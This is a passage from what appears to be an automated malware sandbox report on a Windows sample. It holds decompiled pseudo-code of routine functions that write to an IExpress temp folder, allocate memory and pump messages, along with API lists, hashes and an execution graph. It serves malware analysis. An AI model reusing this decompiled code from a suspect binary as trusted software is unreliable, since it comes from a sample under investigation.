                                                                                                                                                                                                                                      			}















                                                                                                                                                                                                                                      0x0040637b
                                                                                                                                                                                                                                      0x00406382
                                                                                                                                                                                                                                      0x00406388
                                                                                                                                                                                                                                      0x0040639a
                                                                                                                                                                                                                                      0x004063a3
                                                                                                                                                                                                                                      0x004063b1
                                                                                                                                                                                                                                      0x004063b2
                                                                                                                                                                                                                                      0x004063c0
                                                                                                                                                                                                                                      0x004063c5
                                                                                                                                                                                                                                      0x004063e3
                                                                                                                                                                                                                                      0x004063e8
                                                                                                                                                                                                                                      0x004063f9
                                                                                                                                                                                                                                      0x00406413
                                                                                                                                                                                                                                      0x0040641d
                                                                                                                                                                                                                                      0x00406427
                                                                                                                                                                                                                                      0x00406427
                                                                                                                                                                                                                                      0x0040642a
                                                                                                                                                                                                                                      0x004063ea
                                                                                                                                                                                                                                      0x004063ea
                                                                                                                                                                                                                                      0x004063f4
                                                                                                                                                                                                                                      0x004063f4
                                                                                                                                                                                                                                      0x00406440

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 004063DD
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040640B
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040642A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 0040639B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                      • API String ID: 1065093856-816172423
                                                                                                                                                                                                                                      • Opcode ID: 083c4700dbba87774683fc24aa3b9e0fe27c2baf6b302e97de423ad361f0c2bf
                                                                                                                                                                                                                                      • Instruction ID: 018dde7ea6d46da47ae27806943e869c35296208c3f7b006fad9b6d9f93a13a1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 083c4700dbba87774683fc24aa3b9e0fe27c2baf6b302e97de423ad361f0c2bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2921D271A00218ABEB10DF25DC85FDB73A8EB84318F10417AA586B7280CAB85D948F6C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E004047BA(intOrPtr* __ecx) {
                                                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                                                      				intOrPtr* _t22;
                                                                                                                                                                                                                                      				void _t24;
                                                                                                                                                                                                                                      				struct HWND__* _t25;
                                                                                                                                                                                                                                      				struct HWND__* _t26;
                                                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                                                      				intOrPtr* _t28;
                                                                                                                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                      				if(_t34 != 0) {
                                                                                                                                                                                                                                      					_t22 = _t33;
                                                                                                                                                                                                                                      					_t27 = _t22 + 1;
                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                      						_t6 =  *_t22;
                                                                                                                                                                                                                                      						_t22 = _t22 + 1;
                                                                                                                                                                                                                                      					} while (_t6 != 0);
                                                                                                                                                                                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                      					 *_t34 = _t24;
                                                                                                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                                                                                                      						_t28 = _t33;
                                                                                                                                                                                                                                      						_t19 = _t28 + 1;
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							_t9 =  *_t28;
                                                                                                                                                                                                                                      							_t28 = _t28 + 1;
                                                                                                                                                                                                                                      						} while (_t9 != 0);
                                                                                                                                                                                                                                      						E004016A0(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                      						_t11 =  *0x4091e0; // 0x2668628
                                                                                                                                                                                                                                      						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                      						 *0x4091e0 = _t34;
                                                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t25 =  *0x408584; // 0x203b8
                                                                                                                                                                                                                                      					E00404495(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                      					LocalFree(_t34);
                                                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t26 =  *0x408584; // 0x203b8
                                                                                                                                                                                                                                      				E00404495(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                                                      			}















                                                                                                                                                                                                                                      0x004047c2
                                                                                                                                                                                                                                      0x004047ca
                                                                                                                                                                                                                                      0x004047ce
                                                                                                                                                                                                                                      0x004047e9
                                                                                                                                                                                                                                      0x004047eb
                                                                                                                                                                                                                                      0x004047ee
                                                                                                                                                                                                                                      0x004047ee
                                                                                                                                                                                                                                      0x004047f0
                                                                                                                                                                                                                                      0x004047f1
                                                                                                                                                                                                                                      0x00404803
                                                                                                                                                                                                                                      0x00404805
                                                                                                                                                                                                                                      0x00404809
                                                                                                                                                                                                                                      0x00404829
                                                                                                                                                                                                                                      0x0040482c
                                                                                                                                                                                                                                      0x0040482f
                                                                                                                                                                                                                                      0x0040482f
                                                                                                                                                                                                                                      0x00404831
                                                                                                                                                                                                                                      0x00404832
                                                                                                                                                                                                                                      0x0040483a
                                                                                                                                                                                                                                      0x0040483f
                                                                                                                                                                                                                                      0x00404844
                                                                                                                                                                                                                                      0x00404849
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404850
                                                                                                                                                                                                                                      0x0040480b
                                                                                                                                                                                                                                      0x0040481b
                                                                                                                                                                                                                                      0x00404821
                                                                                                                                                                                                                                      0x004047e5
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004047e5
                                                                                                                                                                                                                                      0x004047d0
                                                                                                                                                                                                                                      0x004047e0
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00404E3F), ref: 004047C4
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 004047FD
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00404821
                                                                                                                                                                                                                                        • Part of subcall function 00404495: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004044F4
                                                                                                                                                                                                                                        • Part of subcall function 00404495: MessageBoxA.USER32(?,?,OxZQ,00010010), ref: 00404530
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 0040482B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                      • API String ID: 359063898-816172423
                                                                                                                                                                                                                                      • Opcode ID: 114d165a8013195f8dd96a7a7815608515354d38bd51c0982148e20ed5837f78
                                                                                                                                                                                                                                      • Instruction ID: 176694ab9d1d54c629b4b939aaf974e35f8bbebfa9d4897958025f4795b97822
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 114d165a8013195f8dd96a7a7815608515354d38bd51c0982148e20ed5837f78
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9110AFA204301AFD7149F359D08F737759E7C9300B14893AFE41BB381DA398C068618
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00403670(void* __ecx) {
                                                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                                                      				struct tagMSG _v36;
                                                                                                                                                                                                                                      				int _t8;
                                                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                                                                                                      				_t16 = 0;
                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                      								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_t16 = 1;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                      						} while (_t8 != 0);
                                                                                                                                                                                                                                      						if(_t16 == 0) {
                                                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					break;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return _t8;
                                                                                                                                                                                                                                      			}







                                                                                                                                                                                                                                      0x0040367c
                                                                                                                                                                                                                                      0x0040367f
                                                                                                                                                                                                                                      0x00403681
                                                                                                                                                                                                                                      0x0040368f
                                                                                                                                                                                                                                      0x00403697
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004036aa
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004036ac
                                                                                                                                                                                                                                      0x004036ac
                                                                                                                                                                                                                                      0x004036b0
                                                                                                                                                                                                                                      0x004036bb
                                                                                                                                                                                                                                      0x004036b2
                                                                                                                                                                                                                                      0x004036b4
                                                                                                                                                                                                                                      0x004036b4
                                                                                                                                                                                                                                      0x004036ca
                                                                                                                                                                                                                                      0x004036d0
                                                                                                                                                                                                                                      0x004036d6
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004036d6
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004036aa
                                                                                                                                                                                                                                      0x004036db

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0040368F
                                                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036A2
                                                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 004036BB
                                                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036CA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2776232527-0
                                                                                                                                                                                                                                      • Opcode ID: 8c51841a5e69be5852d79c225193ba482da5141cc1fe4ad1205eda6c084fa8e2
                                                                                                                                                                                                                                      • Instruction ID: a2c70f3a362ebe510b10c279d6afefc7ac98bd9ca345ca95633e1dc3cd4cb844
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c51841a5e69be5852d79c225193ba482da5141cc1fe4ad1205eda6c084fa8e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F01A27290021477DF304BA69C48EEB7A7CEBC6B11F04023AB901F62C4D675C651CAA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                                                                      			E00406592(char* __ecx) {
                                                                                                                                                                                                                                      				char _t3;
                                                                                                                                                                                                                                      				char _t10;
                                                                                                                                                                                                                                      				char* _t12;
                                                                                                                                                                                                                                      				char* _t14;
                                                                                                                                                                                                                                      				char* _t15;
                                                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                                                                                                      				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                      				_t10 = 0;
                                                                                                                                                                                                                                      				do {
                                                                                                                                                                                                                                      					_t3 =  *_t12;
                                                                                                                                                                                                                                      					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                      				} while (_t3 != 0);
                                                                                                                                                                                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                      					if(_t16 <= _t15) {
                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                      						L7:
                                                                                                                                                                                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                      							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						 *_t16 = _t10;
                                                                                                                                                                                                                                      						_t10 = 1;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						_push(_t16);
                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                                                      					return _t10;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                                                      			}









                                                                                                                                                                                                                                      0x00406592
                                                                                                                                                                                                                                      0x00406597
                                                                                                                                                                                                                                      0x00406599
                                                                                                                                                                                                                                      0x0040659c
                                                                                                                                                                                                                                      0x0040659e
                                                                                                                                                                                                                                      0x0040659e
                                                                                                                                                                                                                                      0x004065a0
                                                                                                                                                                                                                                      0x004065a1
                                                                                                                                                                                                                                      0x004065b2
                                                                                                                                                                                                                                      0x004065bb
                                                                                                                                                                                                                                      0x004065c2
                                                                                                                                                                                                                                      0x004065c6
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004065b8
                                                                                                                                                                                                                                      0x004065cd
                                                                                                                                                                                                                                      0x004065cf
                                                                                                                                                                                                                                      0x004065e5
                                                                                                                                                                                                                                      0x004065e5
                                                                                                                                                                                                                                      0x004065e7
                                                                                                                                                                                                                                      0x004065eb
                                                                                                                                                                                                                                      0x004065ba
                                                                                                                                                                                                                                      0x004065ba
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004065ba
                                                                                                                                                                                                                                      0x004065ee
                                                                                                                                                                                                                                      0x004065f1
                                                                                                                                                                                                                                      0x004065f1
                                                                                                                                                                                                                                      0x004065cb
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00402B2C), ref: 004065AC
                                                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 004065BC
                                                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 004065D3
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 004065DF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char$Prev$Next
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3260447230-0
                                                                                                                                                                                                                                      • Opcode ID: 828796b4383d088e17d1056b3097c8ba1f0d67e732c974cb9d04120152cf1a4e
                                                                                                                                                                                                                                      • Instruction ID: 0c413c1c12d1405a39f7ae4b94101a5e688931a2a044885750ef153fdac05deb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 828796b4383d088e17d1056b3097c8ba1f0d67e732c974cb9d04120152cf1a4e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02F0F9710041507ED7325F286C888BB7F9C8F8B254B1A017FE4D2A6144D6790D568665
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00406950() {
                                                                                                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                                                                                                      				intOrPtr* _t5;
                                                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				 *0x4081f8 = E00406C1A();
                                                                                                                                                                                                                                      				__set_app_type(E00406F68(2));
                                                                                                                                                                                                                                      				 *0x4088a4 =  *0x4088a4 | 0xffffffff;
                                                                                                                                                                                                                                      				 *0x4088a8 =  *0x4088a8 | 0xffffffff;
                                                                                                                                                                                                                                      				_t4 = __p__fmode();
                                                                                                                                                                                                                                      				_t11 =  *0x408528; // 0x0
                                                                                                                                                                                                                                      				 *_t4 = _t11;
                                                                                                                                                                                                                                      				_t5 = __p__commode();
                                                                                                                                                                                                                                      				_t12 =  *0x40851c; // 0x0
                                                                                                                                                                                                                                      				 *_t5 = _t12;
                                                                                                                                                                                                                                      				_t6 = E00406FB0();
                                                                                                                                                                                                                                      				if( *0x408000 == 0) {
                                                                                                                                                                                                                                      					__setusermatherr(E00406FB0);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				E0040719D(_t6);
                                                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                                                      			}








                                                                                                                                                                                                                                      0x00406957
                                                                                                                                                                                                                                      0x00406962
                                                                                                                                                                                                                                      0x00406968
                                                                                                                                                                                                                                      0x0040696f
                                                                                                                                                                                                                                      0x00406978
                                                                                                                                                                                                                                      0x0040697e
                                                                                                                                                                                                                                      0x00406984
                                                                                                                                                                                                                                      0x00406986
                                                                                                                                                                                                                                      0x0040698c
                                                                                                                                                                                                                                      0x00406992
                                                                                                                                                                                                                                      0x00406994
                                                                                                                                                                                                                                      0x004069a0
                                                                                                                                                                                                                                      0x004069a7
                                                                                                                                                                                                                                      0x004069ad
                                                                                                                                                                                                                                      0x004069ae
                                                                                                                                                                                                                                      0x004069b5

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406F68: GetModuleHandleW.KERNEL32(00000000), ref: 00406F6F
                                                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 00406962
                                                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 00406978
                                                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 00406986
                                                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 004069A7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1632413811-0
                                                                                                                                                                                                                                      • Opcode ID: d8d42c30e92c537d877bbae37831b229c764d255e7cb53705f62df8c4b64a199
                                                                                                                                                                                                                                      • Instruction ID: a9e4a51b22cd2c7e56f6400325fb3e344ad103297444e233b60a7d1a70b5be6d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8d42c30e92c537d877bbae37831b229c764d255e7cb53705f62df8c4b64a199
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DF0F8705043019FDB147B30BF0A6093BA0FB45325B22467EE0A2BA3E1CF3E8461CA1D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:3.9%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:1.8%
                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                      Total number of Limit Nodes:46
                                                                                                                                                                                                                                      execution_graph 102129 eb54ca 102130 e8005b 22 API calls 102129->102130 102131 eb54cf 102130->102131 102133 e8008b 22 API calls 102131->102133 102135 eb54e8 102131->102135 102132 e8008b 22 API calls 102134 eb550d 102132->102134 102133->102135 102135->102132 102136 e61044 102141 e616c8 102136->102141 102177 e6196d 102141->102177 102145 e6173f 102146 e6addd 22 API calls 102145->102146 102147 e61749 102146->102147 102148 e6addd 22 API calls 102147->102148 102149 e61753 102148->102149 102150 e6addd 22 API calls 102149->102150 102151 e6175d 102150->102151 102152 e6addd 22 API calls 102151->102152 102153 e6179b 102152->102153 102154 e6addd 22 API calls 102153->102154 102155 e61867 102154->102155 102187 e61cf1 102155->102187 102159 e61899 102160 e6addd 22 API calls 102159->102160 102221 e619c6 102177->102221 102180 e619c6 22 API calls 102181 e619a5 102180->102181 102182 e6addd 22 API calls 102181->102182 102183 e619b1 102182->102183 102184 e673e7 22 API calls 102183->102184 102185 e616fe 102184->102185 102186 e62198 6 API calls 102185->102186 102186->102145 102188 e6addd 22 API calls 102187->102188 102189 e61d01 102188->102189 102190 e6addd 22 API calls 102189->102190 102191 e61d09 102190->102191 102192 e6addd 22 API calls 102191->102192 102193 e61d24 102192->102193 102194 e8005b 22 API calls 102193->102194 102195 e61871 102194->102195 102196 e6211f 102195->102196 102197 e6212d 102196->102197 102198 e6addd 22 API calls 102197->102198 102199 e62138 102198->102199 102200 e6addd 22 API calls 102199->102200 102201 e62143 102200->102201 102202 e6addd 22 API calls 102201->102202 102203 e6214e 102202->102203 102204 e6addd 22 API calls 102203->102204 102205 e62159 102204->102205 102206 e8005b 22 API calls 102205->102206 102207 e6216b RegisterWindowMessageW 102206->102207 102207->102159 102222 e6addd 22 API calls 102221->102222 102223 e619d1 102222->102223 102224 e6addd 22 API calls 102223->102224 102225 e619d9 102224->102225 102226 e6addd 22 API calls 102225->102226 102227 e6199b 102226->102227 102227->102180 102248 e6a704 102249 e6a70e 102248->102249 102250 e6aa39 22 API calls 102249->102250 102270 e6a440 102250->102270 102251 e6a64b 102252 e6aa39 22 API calls 102251->102252 102255 e6a665 102252->102255 102253 e67ea0 41 API calls 102253->102270 102254 e66ac7 23 API calls 102254->102270 102256 eafc70 102276 ec9d48 84 API calls 102256->102276 102257 e6aa39 22 API calls 102257->102270 102258 eafb49 102264 e8005b 22 API calls 102258->102264 102261 e69c10 22 API calls 102261->102270 102262 e6abe7 22 API calls 102262->102270 102263 eafc7e 102265 e6aa39 22 API calls 102263->102265 102266 eafb6a 102264->102266 102267 eafc94 102265->102267 102269 e8008b 22 API calls 102266->102269 102267->102255 102268 e6a99d 102277 ec9d48 84 API calls 102268->102277 102271 eafba4 102269->102271 102270->102251 102270->102253 102270->102254 102270->102256 102270->102257 102270->102258 102270->102261 102270->102262 102270->102268 102270->102271 102272 e6b139 22 API calls 102270->102272 102273 e6ab97 22 API calls 102270->102273 102275 e8008b 22 API calls 102270->102275 102271->102268 102274 e6a61c CharUpperBuffW 102272->102274 102273->102270 102274->102270 102275->102270 102276->102263 102277->102255 102278 e62282 SystemParametersInfoW 100386 e6a761 100395 e6812e 100386->100395 100388 e6a79c 100390 e6aa39 22 API calls 100388->100390 100389 e6a772 100389->100388 100403 e6ab97 100389->100403 100394 e6a667 100390->100394 100415 e6abe7 100395->100415 100397 ea5be3 100421 ec9d48 84 API calls 100397->100421 100399 ea5bf1 100400 e6818b 100400->100389 100401 e6813d 100401->100397 100401->100400 100402 e69c10 22 API calls 100401->100402 100402->100401 100406 e6aba7 100403->100406 100404 e8005b 22 API calls 100405 e6a790 100404->100405 100407 e6aa39 100405->100407 100406->100404 100408 e6aac3 100407->100408 100414 e6aa49 100407->100414 100410 e8008b 22 API calls 100408->100410 100409 e8005b 22 API calls 100411 e6aa50 100409->100411 100410->100414 100412 e6aa6e 100411->100412 100413 e8005b 22 API calls 100411->100413 100412->100388 100413->100412 100414->100409 100416 e6abf4 100415->100416 100417 e6ac01 100415->100417 100416->100401 100422 e8005b 100417->100422 100419 e6ac0b 100432 e8008b 100419->100432 100421->100399 100426 e80060 100422->100426 100424 e8007a 100424->100419 100426->100424 100428 e8007c 100426->100428 100442 